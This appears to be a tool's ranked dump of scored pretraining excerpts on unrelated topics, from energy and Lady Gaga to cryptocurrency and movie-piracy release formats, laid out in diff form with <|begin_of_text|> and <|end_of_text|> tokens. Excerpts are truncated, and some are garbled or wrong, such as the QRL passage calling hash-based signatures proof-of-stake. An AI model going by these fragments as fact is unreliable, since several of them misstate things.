the time required to regenerate an energy resource. "Renewable" resources are those that recover their capacity in a time significant by human needs. Examples are hydroelectric power or wind power, when the natural phenomena that are the primary source of energy are ongoing and not depleted by human demands. Non-renewable resources are those that are significantly depleted by human usage and that will not recover their potential significantly during human lifetimes. An example of a non-renewable energy source is coal, which does not form naturally at a rate that would support human use. + +Fossil fuels [ edit ] + +Fossil fuel (primary non-renewable fossil) sources burn coal or hydrocarbon fuels, which are the remains of the decomposition of plants and animals. There are three main types of fossil fuels: coal, petroleum, and natural gas. Another fossil fuel, liquefied petroleum gas (LPG), is principally derived from the production of natural gas. Heat +================================================================================ +Rank = 1; Score = 56885248.0 +<|begin_of_text|>Lady Gaga is an American singer, songwriter, and actress who has received many awards and nominations for her contributions to the music industry. She rose to prominence with the release of her debut album The Fame in 2008. The album won several awards and was nominated for six Grammy Awards, including Album of the Year. The album and its single "Poker Face" won Best Electronic/Dance Album and Best Dance Recording, respectively, at the 52nd Grammy Awards. The album also won International Album at the 2010 BRIT Awards. A follow-up EP, titled The Fame Monster, was released in 2009, and included the singles "Bad Romance" and "Telephone". The music videos of the songs won eight accolades from thirteen nominations at the 2010 MTV Video Music Awards (VMA), making Gaga the most nominated artist in VMA history for a single year and the first female artist to receive two nominations for Video of the Year in one single night.[1] In 2011, Gaga was nominated for six Grammy Awards, and won three—Best Pop Vocal Album for The Fame Monster, and Best Female Pop Vocal Performance and Best Short Form Music Video for "Bad Romance". + +Born This Way (2011), Gaga's second studio album, accrued three nominations at the 54th Annual Grammy Awards, including her third consecutive nomination for Album of the Year. It won the People's Choice Awards for Album of the Year the following year, and the music video for the title track won two VMAs, including Best Female Video. Her third album, Artpop (2013), won the award for World's Best Album by a Female at the 2014 World Music Awards. In other musical ventures, Gaga released a collaborative jazz album with Tony Bennett, titled Cheek to Cheek (2014), which received the Grammy Award for Best Traditional Pop Vocal Album. + +In 2015, Gaga released a song "Til It Happens to You", for the documentary film, The Hunting Ground. The song won a Satellite Award for Best Original Song, while nominated for an Academy Award, a Critics' Choice Movie Award for Best Song, and a Grammy Award for Best Song Written for Visual Media. In the same year she was named Woman of the Year by Billboard. She also became the first woman to receive the Digital Diamond Award from RIAA,[2] and the first artist to win the Songwriters Hall of Fame's Contemporary Icon Award for "attaining an iconic status in pop culture". Gaga received a Golden +================================================================================ +Rank = 2; Score = 28835840.0 +<|begin_of_text|>The many potential social and economic benefits from advances in AI-based technologies depend entirely on the environment in which these technologies evolve, says the Royal Society. According to a new report from the UK’s science academy, urgent consideration needs to be given to the “careful stewardship” needed over the next ten years to ensure that the dividends from machine learning – the form of artificial intelligence that allows machines to learn from data – benefit all in UK society. + +Machine Learning: the power and promise of computers that learn by example, published today (25 April 2017), comes at a critical time in the rapid development and use of this technology, and the growing debate about how it will reshape the UK economy and people’s lives. Crucially the report calls for research funding bodies to support a new wave of machine learning research that goes beyond technical challenges, and into areas aimed at addressing public confidence in machine learning – vital to the UK maintaining its internationally competitive edge at the forefront of this area. + +The report also offers the first evidence about the UK public’s views on machine learning, including the application areas about which they are particularly positive, and the need for the real-world data feeding the growth of this technology to be dealt with fairly and securely. + +Professor Peter Donnelly FRS, chair of the report’s working group and Director of the Wellcome Trust Centre for Human Genetics and Professor of Statistical Science at the University of Oxford, says: + +“Machine learning is already used in many apps and services that we encounter every day. It is used to tag people in our photos, by our phones to interpret voice commands, by internet retailers to make recommendations, and by banks to spot unusual activity on a credit or debit card. However, these current applications only scratch the surface of understanding just how powerful a technology this could be. + +“Machine learning will have an increasing impact on our lives and lifestyles over the next five to ten years. There is much work to be done so that we take advantage of machine learning’s potential and ensure that the benefits are shared, especially as this could be a key area of opportunity for the UK in the coming years.” + +An action plan so no one is left behind and the benefits are shared + +The report calls for action in a number of key areas over the next five to ten years to create an environment of “careful stewardship” that can help ensure that the benefits of this technology are felt broadly. Understanding who will be most affected, how the benefits are likely to be distributed, and where the opportunities for growth lie, will be key to designing +================================================================================ +Rank = 3; Score = 12386304.0 +<|begin_of_text|>An enterprise such as Flipkart & Amazon is the master at analyzing big data. They have a huge a knowledge gathered from analyzing big data to achieve an edge over their competitor. Just think about the Amazon’s recommendation engine. It analyzes the process of buying history, buying habits, and pattern what people like to buying. With big data and predictive analytics, they have to build a marketing strategy and created an extremely successful business model. + +So these things should be upon your mind while knowing about the big data analytics because with a rise in computational power, robust data infrastructure, rapid algorithm development, and the need to obtain better insight from an increasingly vast amount of data. + +Big Data Analytics: – Types + +Explore Analytics It can be used to explore your data in a graphical manner where your data provides some value through simple visualizations. It often used when you have a large amount of disparate data. + +Advance Analytics: It provides analytics algorithms for executing complex analysis of either structured or unstructured data. It also includes such as machine learning, statistical model, text analytics and other data-mining techniques. + +Operationalized Analytics: Are the part of the business process that helps to achieve operational efficiency by building models. For example, a data scientist for a banking organization might build a model that predicts the identity theft of its customer. + +Summary + +The capability to analyze big data provides unique opportunities for many enterprises. However comprehending big data can be challenging. Due to algorithms & technologies, basic analysis becomes confusing. It depends upon the scale size which means how many you’re capable for that. + +For any query feel free & write an email us on:-support@raygain.com or visit our website:-http://www.raygain.com/<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 4; Score = 11141120.0 +<|begin_of_text|>The Anatomy of a Large-Scale Hypertextual Web Search Engine + +Sergey Brin and Lawrence Page + +{sergey, page}@cs.stanford.edu + +Computer Science Department, Stanford University, Stanford, CA 94305 + +Abstract + +In this paper, we present Google, a prototype of a large-scale search engine which makes heavy use of the structure present in hypertext. Google is designed to crawl and index the Web efficiently and produce much more satisfying search results than existing systems. The prototype with a full text and hyperlink database of at least 24 million pages is available at http://google.stanford.edu/ + +To engineer a search engine is a challenging task. Search engines index tens to hundreds of millions of web pages involving a comparable number of distinct terms. They answer tens of millions of queries every day. Despite the importance of large-scale search engines on the web, very little academic research has been done on them. Furthermore, due to rapid advance in technology and web proliferation, creating a web search engine today is very different from three years ago. This paper provides an in-depth description of our large-scale web search engine -- the first such detailed public description we know of to date. + +Apart from the problems of scaling traditional search techniques to data of this magnitude, there are new technical challenges involved with using the additional information present in hypertext to produce better search results. This paper addresses this question of how to build a practical large-scale system which can exploit the additional information present in hypertext. Also we look at the problem of how to effectively deal with uncontrolled hypertext collections where anyone can publish anything they want. Keywords: World Wide Web, Search Engines, Information Retrieval, PageRank, Google + +1. Introduction + +1.1 Web Search Engines -- Scaling Up: 1994 - 2000 + +1.2. Google: Scaling with the Web + +These tasks are becoming increasingly difficult as the Web grows. However, hardware performance and cost have improved dramatically to partially offset the difficulty. There are, however, several notable exceptions to this progress such as disk seek time and operating system robustness. In designing Google, we have considered both the rate of growth of the Web and technological changes. Google is designed to scale well to extremely large data sets. It makes efficient use of storage space to store the index. Its data structures are optimized for fast and efficient access (see section 4.2). Further, we expect that the cost to index and store text or HTML will eventually decline relative to the amount that will be available +================================================================================ +Rank = 5; Score = 10616832.0 +<|begin_of_text|>A year ago, we shared with you our belief that Algorithm Development is Broken, where we laid out the problems in the world of algorithm development, and our vision of how to make things better. + +Since then, we’ve been working hard to create our vision of the world’s first open marketplace for algorithms – and you, the developers of the world, have enthusiastically joined us to help active the algorithm economy. + +Today, we are proud to open our doors to the world, and deliver on our promise of a global, always-available, open marketplace for algorithms. For the first time, algorithm developers can publish their algorithms as a live API and applications can be made smarter by taking advantage of these intelligent algorithms. + +Algorithm Development with Algorithmia + +Live : easy access to any algorithm, callable at any time + +: easy access to any algorithm, callable at any time No dependencies : no downloads, no installs, no stress + +: no downloads, no installs, no stress Interoperable : call any algorithm regardless of programming language + +: call any algorithm regardless of programming language Composable : algorithms are building blocks, build something bigger! + +: algorithms are building blocks, build something bigger! Invisible but powerful infrastructure : don’t worry about containers, networks, or scaling; we make your algorithm scale to hundreds of machines + +: don’t worry about containers, networks, or scaling; we make your algorithm scale to hundreds of machines No operations: we scale, meter, optimize and bill for you + +With our public launch we are enabling payments and go from being a repository of algorithms, to a true marketplace: + +For algorithm developers, Algorithmia provides a unique opportunity to increase the impact of their work and collect the rewards associated with it. + +For application developers, Algorithmia provides the largest repository of live algorithms ever assembled, supported by a vibrant community of developers. + +So far, users have contributed over 800 algorithms, all under one API that grows every day. The most exciting thing from our point of view is watching the Algorithmia Marketplace grow and expand in its functionality. + +In just the last few months, Algorithmia has gained the ability to: + +Summarize and generate topics from unstructured text + +Extract structure and information from arbitrary websites + +Perform computer vision tasks like Face Detection and Image Similarity + +Look for patterns and anomalies in data + +Dozens of microservice building blocks + +… with more added every day + +Thanks to the thousands of developers who joined our cause, contributed algorithms, and gave us countless hours of feedback so far. We are very excited to be opening our doors, and +================================================================================ +Rank = 6; Score = 8650752.0 +<|begin_of_text|>Introduction A carbon footprint is the measure of the amount of greenhouse gases (Carbon footprint), measured in units of carbon dioxide, produced by human activities. A carbon footprint can be measured for an individual or an organization, and is typically given in tons of CO 2 -equivalent (CO 2 -eq) per year. For example, the average North American generates about 20 tons of CO 2 -eq each year. The global average carbon footprint is about 4 tons of CO 2 -eq per year (Figure 1). + +Introduction A carbon footprint is the measure of the amount of greenhouse gases (Carbon footprint), measured in units of carbon dioxide, produced by human activities. A carbon footprint can be measured for an individual or an organization, and is typically given in tons of CO 2 -equivalent (CO 2 -eq) per year. For example, the average North American generates about 20 tons of CO 2 -eq each year. The global average carbon footprint is about 4 tons of CO 2 -eq per year (Figure 1). + +Figure 1. National carbon dioxide (CO2) emissions per capita. (2005). (Source: UNEP/GRID-Arendal Maps and Graphics Library) + +An individual’s or organization’s carbon footprint can be broken down into the primary and secondary footprints. The primary footprint is the sum of direct emissions of greenhouse gases from the burning of fossil fuels for energy consumption and transportation. More fuel-efficient cars have a smaller primary footprint, as do energy-efficient light bulbs in your home or office. Worldwide, 82% of anthropogenic greenhouse gas emissions are in the form of CO 2 from fossil fuel combustion (Figure 2). + +The secondary footprint is the sum of indirect emissions of greenhouse gases during the lifecycle of products used by an individual or organization. For example, the greenhouse gases emitted during the production of plastic for water bottles, as well as the energy used to transport the water, contributes to the secondary carbon footprint. Products with more packaging will generally have a larger secondary footprint than products with a minimal amount of packaging. + +Greenhouse gases and the greenhouse effect + +Figure 2. Anthropogenic greenhouse gas emissions. (Source: Energy Information Administration) + +Although carbon footprints are reported in annual tons of CO 2 emissions, they actually are a measure of total greenhouse gas emissions. A greenhouse gas is any gas that traps heat in the atmosphere through the greenhouse effect. Because of the presence of greenhouse gases in our atmosphere the average temperature of the Earth +================================================================================ +Rank = 7; Score = 8519680.0 +<|begin_of_text|>Photo + +Google and a corporation associated with NASA are forming a laboratory to study artificial intelligence by means of computers that use the unusual properties of quantum physics. Their quantum computer, which performs complex calculations thousands of times faster than existing supercomputers, is expected to be in active use in the third quarter of this year. + +The Quantum Artificial Intelligence Lab, as the entity is called, will focus on machine learning, which is the way computers take note of patterns of information to improve their outputs. Personalized Internet search and predictions of traffic congestion based on GPS data are examples of machine learning. The field is particularly important for things like facial or voice recognition, biological behavior, or the management of very large and complex systems. + +“If we want to create effective environmental policies, we need better models of what’s happening to our climate,” Google said in a blog post announcing the partnership. “Classical computers aren’t well suited to these types of creative problems.” + +Google said it had already devised machine-learning algorithms that work inside the quantum computer, which is made by D-Wave Systems of Burnaby, British Columbia. One could quickly recognize information, saving power on mobile devices, while another was successful at sorting out bad or mislabeled data. The most effective methods for using quantum computation, Google said, involved combining the advanced machines with its clouds of traditional computers. + +Google bought the machine in cooperation with the Universities Space Research Association, a nonprofit research corporation that works with NASA and others to advance space science and technology. Outside researchers will be invited to the lab as well. + +This year D-Wave sold its first commercial quantum computer to Lockheed Martin. Lockheed officials said the computer would be used for the test and measurement of things like jet aircraft designs, or the reliability of satellite systems. + +The D-Wave computer works by framing complex problems in terms of optimal outcomes. The classic example of this type of problem is figuring out the most efficient way a traveling salesman can visit 10 customers, but real-world problems now include hundreds of such variables and contingencies. D-Wave’s machine frames the problem in terms of energy states, and uses quantum physics to rapidly determine an outcome that satisfies the variables with the least use of energy. + +In tests last September, an independent researcher found that for some types of problems the quantum computer was 3,600 times faster than traditional supercomputers. According to a D-Wave official, the machine performed even better in Google’s tests, which involved 500 variables with different constraints. + +“The tougher, more complex ones had better performance,” said Colin Williams +================================================================================ +Rank = 8; Score = 8454144.0 +<|begin_of_text|>Conceptualized by Dr. Peter Waterland, Quantum Resistant Ledger ($QRL) is a cryptocurrency ledger that uses hash-based digital signatures (proof-of-stake algorithms) instead of proof-of-work algorithms. + +Because of this, it is resistant to both quantum and classical computing attacks. QRL is one of the first blockchain-based ledger to use post-quantum cryptography technology. For this reason, it has generated a lot of interest among cryptocurrency enthusiasts and blockchain developers alike. The companies cryptocurrency $QRL is currently trading as an ERC20 token on various exchanges including Liqui, Tidex and the most popular Bittrex. + +QRL plans to allow mining (Genesis block) in September 2017. The number of coins in the Genesis block and the final distribution, which will happen in 200 years, are 65 million and 105 million respectively. + +What is Quantum Computing? + +Quantum computing is basically the use of quantum computers to perform computer-related tasks. Quantum computers store information in quantum bits (qubits) instead of bits. It is important to note that a qubit can store multiple numbers at once (a zero, a one, both a zero and a one, or any other value between a zero and a one). + +For this reason, a quantum computer can perform multiple calculations simultaneously. Put another way, a quantum computer can work in parallel, allowing it to solve complex mathematical problems involving factorization, such as “prime factors” of a large number. This means that quantum computing can break cryptographic protocols, including the ones used by blockchain networks. + +How will Quantum Resistant Ledger help crypto currency eco systems in a post-quantum computing world? + +The conventional encryption protocols used to protect blockchain networks including Elliptic Curve Digital Signature Algorithm or ECDSA, elliptical curve cryptography (ECC) and large prime number cryptography (RSA) are vulnerable to quantum computing. + +More specifically, quantum computing would make it possible to reverse engineer private keys quickly, thereby rendering the aforementioned encryption protocols useless. This is where QRL comes in handy. QRL uses post-quantum cryptography technology, which means it is theoretically immune from quantum computing attacks. + +Protecting Our Future: Quantum Computing Threats & Considerations + +Let's start with preparing for cyber-war scenarios. + +So far, blockchain-based encryption algorithms such as ECDSA have been able to keep cybercriminals at bay because classical computers cannot break such algorithms. However, the introduction of quantum computing could potentially lead to a blockchain Armageddon because of the following threats: + +1) Government Applications: +================================================================================ +Rank = 9; Score = 8060928.0 +<|begin_of_text|>Crowdsourcing is a sourcing model in which individuals or organizations obtain goods and services. These services include ideas and finances, from a large, relatively open and often rapidly-evolving group of internet users; it divides work between participants to achieve a cumulative result. The word crowdsourcing itself is a portmanteau of crowd and outsourcing, and was coined in 2005.[1][2][3][4] As a mode of sourcing, crowdsourcing existed prior to the digital age (i.e. "offline").[5] + +There are major differences between crowdsourcing and outsourcing. Crowdsourcing comes from a less-specific, more public group, whereas outsourcing is commissioned from a specific, named group, and includes a mix of bottom-up and top-down processes.[6][7][8] Advantages of using crowdsourcing may include improved costs, speed, quality, flexibility, scalability, or diversity.[9][10] + +Some forms of crowdsourcing, such as in "idea competitions" or "innovation contests" provide ways for organizations to learn beyond the "base of minds" provided by their employees (e.g. LEGO Ideas).[11] Tedious "microtasks" performed in parallel by large, paid crowds (e.g. Amazon Mechanical Turk) are another form of crowdsourcing. It has also been used by not-for-profit organizations and to create common goods (e.g. Wikipedia).[12] The effect of user communication and the platform presentation should be taken into account when evaluating the performance of ideas in crowdsourcing contexts.[13] + +Definitions [ edit ] + +The term "crowdsourcing" was coined in 2005 by Jeff Howe and Mark Robinson, editors at Wired, to describe how businesses were using the Internet to "outsource work to the crowd",[1] which quickly led to the portmanteau "crowdsourcing." Howe, first published a definition for the term crowdsourcing in a companion blog post to his June 2006 Wired article, "The Rise of Crowdsourcing", which came out in print just days later:[14] + +"Simply defined, crowdsourcing represents the act of a company or institution taking a function once performed by employees and outsourcing it to an undefined (and generally large) network of people in the form of an open call. This can take the form of peer-production (when the job is performed collaboratively), but is also often undertaken by sole individuals. The crucial prerequisite is the use of the open call format and the large network of potential laborers." + +In a February 1, 200 +================================================================================ +Rank = 10; Score = 7864320.0 +<|begin_of_text|>How to use your Emotional Intelligence to Better PM + +Veamly Blocked Unblock Follow Following Jun 26, 2017 + +(Originally posted on Veamly) + +Note : This blog is based on Vivek Bedi’s talk, The VP of Product at LearnVest on Product School + +As a Product Manager, you don’t only need to oversee the production process, but you also have to lead and motivate your team. After all, they are the people behind the success or the failure of the product. But the thing is that, they all have different personalities and come from very different backgrounds. + +You have the shy and introvert engineers, the extrovert developers, the young and goal driven marketers, the creative designers, etc. You also need to deal with the product’s users on a daily basis: Make sure that your clients are satisfied, understand clearly their asks and know how to approach each one. That’s why it is important to use your Emotional Intelligence in order to better assess your team and your end users’ behaviors. + +Imagine this! + +If you have to release a product within 2 months and you have to choose the person you will be spending most of your time with, who would you choose? How would you describe this person? + +If your answer is one or more of the following adjectives : Patient, Empathetic, Thoughtful, Flexible, Hard worker… You may be interested in the soft skills of the person rather than his hard skills and IQ. Indeed, you want to work with a person you like but who also helps you process fast. In product Management, more than any other profession, the soft skills are extremely important. + +Imagine also receiving a request from a client for a feature that you would describe as obvious. You may have to explore your empathy since recognizing that not everyone interprets things the same way. + +So What’s Emotional Intelligence? + +Emotional Intelligence is the ability to identify and manage your own emotions and the emotions of others. It is generally said to include three skills: emotional awareness; the ability to harness emotions and apply them to tasks like thinking and problem solving; and the ability to manage emotions, which includes regulating your own emotions and cheering up or calming down other people. (Source) + +So, Emotional Intelligence (EQ or EI) in a nutshell is defined as the ability to + +Recognize, understand and manage our own emotions + +Recognize, understand and influence the emotions of others + +How to leverage your Emotional intelligence for Product Management? + +Here are 8 Tips that we gathered from Vivek Bed +================================================================================ +Rank = 11; Score = 7831552.0 +<|begin_of_text|>Hermeticism is based on the teachings of a mysterious man named Hermes Trismegistus. He is portrayed as a wise teacher, a powerful magician, and a skilled mystic. He has been seen as a teacher of Moses, the inventor of alchemy, and the founder of occult schools throughout history. + +Alexandrian Origins + +Hermes Trismegistus is a composite of several mythological figures. He arose in Ptolemaic Alexandria, where the mishmash of Hellenistic and Egyptian culture bred dozens of interesting cults, religions, and deities. Early on, the Hellenistic deity Hermes became associated with the Egyptian deity Thoth.1 Both were inventors of writing and gods of magic. Both were also psychopomps, responsible for guiding souls in the afterlife. As a result, over the centuries they became identified with each other and were even worshiped together in certain Egyptian temples. In fact, Khmun, the Egyptian center for the cult of Thoth, became known as Hermopolis under the Ptolemies. + +Because of this, Hermes Trismegistus, as a legendary teacher of magic and mysticism, was probably a humanized syncretization of Hermes and Thoth. His legacy has been immense. + +Multiple Hermes? + +Even though Hermes Trismegistus was a mythical figure, many ancient writers wrote about him as if he was a real person. This produced disagreements and confusion. At some point, it began to be assumed that there were two Hermes. In Asclepius, Hermes Trismegistus talks about his grandfather: + +Is it not true that my grandfather Hermes, after whom I am named, resides in his eponymous town whence he aids and cures all those who come to him from every land? + +Asclepius 372 + +This passage indicates that the Grandfather Hermes is in fact identical with the deity Hermes, residing at Hermopolis.3 Ancient writers invented additional Hermes to fill in the gaps. In fact, it could be that the title “Trismegistus” refers to many great Hermes characters, a line of sages and mystics bringing the Hermetic teachings to humanity over many generations.4 + +Astrologer, Magus, Alchemist + +The Hermetica that we read and write about most often are not the only ancient books ascribed to Hermes Trismegistus. Multiple important early works on astrology were also attributed to the legendary sage. The link between Hermes and +================================================================================ +Rank = 12; Score = 7798784.0 +<|begin_of_text|>A cam is ausually done with a digital video camera. A mini tripod is sometimes used, but a lot of the time this wont be possible, so the camera make shake. Also seating placement isn’t always idle, and it might be filmed from an angle. If cropped properly, this is hard to tell unless there’s text on the screen, but a lot of times these are left with triangular borders on the top and bottom of the screen. Sound is taken from theof the camera, and especially in comedies, laughter can often be heard during the film. Due to these factors picture and sound quality are usually quite poor, but sometimes, and the theater will be fairly empty and a fairly clear signal will be heard.A telesync is the same spec as a CAM except it uses(most likely an audio jack in the chair for hard of hearing people). A direct audio source does not ensure a good quality audio source, as a lot of background noise can interfere. A lot of the times a telesync is filmed in an empty cinema or from the projection booth with a professional camera, giving a better picture quality. Quality ranges drastically, check the sample before downloading the full release.A telecine machine copies the film digitally from the. Sound and picture should be very good, but due to the equipment involved and cost telecines are fairly uncommon. Generally the film will be in correct aspect ratio, althoughtelecines have existed. A great example is thedone a few years ago. TC should not be confused with TimeCode, which is a visible counter on screen throughout the film., sent to rental stores, and various other places for promotional use. A screener is supplied on a VHS tape, and is usually in a 4:3 (full screen) a/r, although letterboxed screeners are sometimes found. The main draw back is a “ticker“ (a message that scrolls past at the bottom of the screen, with the copyright and anti-copy telephone number). Also, if the tape contains any serial numbers, or any other markings that could lead to the source of the tape, these will have to be blocked, usually with a black mark over the section. This is sometimes only for a few seconds, but unfortunately on some copies this will last for the entire film, and some can be quite big. Depending on the equipment used, screener quality can range from excellent if done from a MASTER copy, to very poor if done on an old VHS recorder thru poor capture equipment on a copied +================================================================================ +Rank = 13; Score = 7372800.0 +<|begin_of_text|>The expansion of the universe is the increase of the distance between two distant parts of the universe with time.[1] It is an intrinsic expansion whereby the scale of space itself changes. The universe does not expand "into" anything and does not require space to exist "outside" it. Technically, neither space nor objects in space move. Instead it is the metric governing the size and geometry of spacetime itself that changes in scale. Although light and objects within spacetime cannot travel faster than the speed of light, this limitation does not restrict the metric itself. To an observer it appears that space is expanding and all but the nearest galaxies are receding into the distance. + +During the inflationary epoch about 10−32 of a second after the Big Bang, the universe suddenly expanded, and its volume increased by a factor of at least 1078 (an expansion of distance by a factor of at least 1026 in each of the three dimensions), equivalent to expanding an object 1 nanometer (10−9 m, about half the width of a molecule of DNA) in length to one approximately 10.6 light years (about 1017 m or 62 trillion miles) long. A much slower and gradual expansion of space continued after this, until at around 9.8 billion years after the Big Bang (4 billion years ago) it began to gradually expand more quickly, and is still doing so. + +The metric expansion of space is of a kind completely different from the expansions and explosions seen in daily life. It also seems to be a property of the universe as a whole rather than a phenomenon that applies just to one part of the universe or can be observed from "outside" it. + +Metric expansion is a key feature of Big Bang cosmology, is modeled mathematically with the Friedmann-Lemaître-Robertson-Walker metric and is a generic property of the universe we inhabit. However, the model is valid only on large scales (roughly the scale of galaxy clusters and above), because gravitational attraction binds matter together strongly enough that metric expansion cannot be observed at this time, on a smaller scale. As such, the only galaxies receding from one another as a result of metric expansion are those separated by cosmologically relevant scales larger than the length scales associated with the gravitational collapse that are possible in the age of the universe given the matter density and average expansion rate. + +Physicists have postulated the existence of dark energy, appearing as a cosmological constant in the simplest gravitational models as a way to explain the +================================================================================ +Rank = 14; Score = 7307264.0 +<|begin_of_text|>In the world of elearning, microlearning has become a buzzword. It’s considered a powerful new approach to training the workforce. With the average attention span in North America dropping from 12 seconds in 2000 to 8 seconds in 2015, the demand for shorter, more engaging training is higher than ever! + +In this post, our goal is to cover the basics and leave you with an understanding of: What Microlearning is and the benefits it can provide. Throughout this post, we’ll try to give you examples of how to use microlearning in your own training programs. + +What is Microlearning? + +Microlearning is focused learning that is delivered in bite sized chunks. Since this method of learning provides small bits of knowledge at a time, it’s best used for delivering information that learners need to retain. + +Microlearning can be achieved using a number of different delivery methods: emails, online posts and short multimedia videos, are all examples of different ways you can deliver training that is designed for your learners to retain new knowledge and achieve their educational goals. + +Examples of Microlearning: + +– Watching video tutorials on Youtube + +– Receiving small bits of education via email: like Word of the Day from Dictionary.com + +– Online learning programs like Duolingo or Lynda + +What are the benefits that Microlearning can provide? + +1. Avoid the risk of overwhelming learners + +Microlearning allows learners to move at their own pace, giving them the ability to go back and review complex concepts as often as needed. Since new knowledge is delivered in smaller chunks, learners avoid the risk of being overwhelmed by too much information at once. + +2. Create on-the-go training that can be accessed anywhere, at anytime. + +Microlearning can be achieved using a number of different delivery methods. Email, online posts, videos, even tweets because of this training can usually be accessed across multiple devices, making it available on-the-go. Learners can access and review training materials while doing everyday tasks like: waiting for the bus, sitting on the train, or even riding the elevator! + +3. Help learners better retain new knowledge + +Traditional classroom training often provides little to no long term takeaways for learners. The Wall Street Journal recently reported that 90 percent of new skills are lost within a year of training! Microlearning breaks new knowledge down into short chunks making learning easier to digest, understand, and apply on the job. + +Different ways to use Microlearning: + +– Health and Safety training + +– Learning new software + +– Business Processes and Procedures + +Microlearning yields many benefits for organizations looking +================================================================================ +Rank = 15; Score = 7241728.0 +<|begin_of_text|>In the report, titled "China's Rise in Artificial Intelligence," the investment bank said the world's second-largest economy has emerged as a major global contender in using AI to drive economic progress. + +Goldman said the government and companies have identified AI and machine learning as the next big areas of innovation. + +"We believe AI technology will become a priority on the government's agenda, and we expect further national/regional policy and funding support on AI to follow," the bank said. + +AI is already widespread: From simple smartphone applications that can tell the weather to complex algorithms that are able to easily beat humans in board games. + +Companies such as Google and Microsoft have poured vast amounts of money into research and development to expand the horizon of what AI can achieve. Machines are fed large quantities of data and taught specific tasks, allowing companies to create software that can learn and become smarter. + +While the United States is generally considered to be leading the field, other countries are catching up. China, home of internet powerhouses such as Baidu, Alibaba and Tencent, is one of them. + +In July, China's State Council issued guidelines on developing AI inside the country and set a goal of becoming a global innovation center for it by 2030. It expects the total output value of AI industries to surpass 1 trillion yuan ($147.80 billion). + +The Council encouraged the creation of open-source computing platforms and training more AI professionals and scientists. The guidelines said the government will invest in qualified AI projects and encourage private capital investment.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_t